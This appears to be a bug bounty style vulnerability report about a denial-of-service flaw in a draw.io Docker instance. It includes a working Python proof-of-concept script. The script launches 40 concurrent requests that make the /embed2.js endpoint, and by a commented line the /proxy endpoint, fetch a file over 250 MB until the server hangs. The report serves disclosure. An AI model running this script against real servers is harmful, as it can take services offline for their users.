Description

consider following script

exploit.py

put drawio_docker_instace your address and also big_file_address should be serve a big image file ( > 250 MB)

from multiprocessing import Process
import requests

def fun():
    try:
       requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
       #requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
       print("OK")
    except:
        print("error from server")

def main():
    for i in range(1,40):
        p = Process(target=fun, args=())
        p.start()

if __name__ == '__main__':
    main()

I upload forty 250MB photos at the same time, and the server hangs up ( I test it on upcloud basic server plan)
both /proxy and /embed2.js was vulnerable to DOS and /embed2.js was more vulnerable as I saw in docker status you can check it yourself with my POC.py file

Proof of Concept

The POC is for the /embed2.js endpoint and for the /proxy endpoint we should increase the number of simultaneously Processes
https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing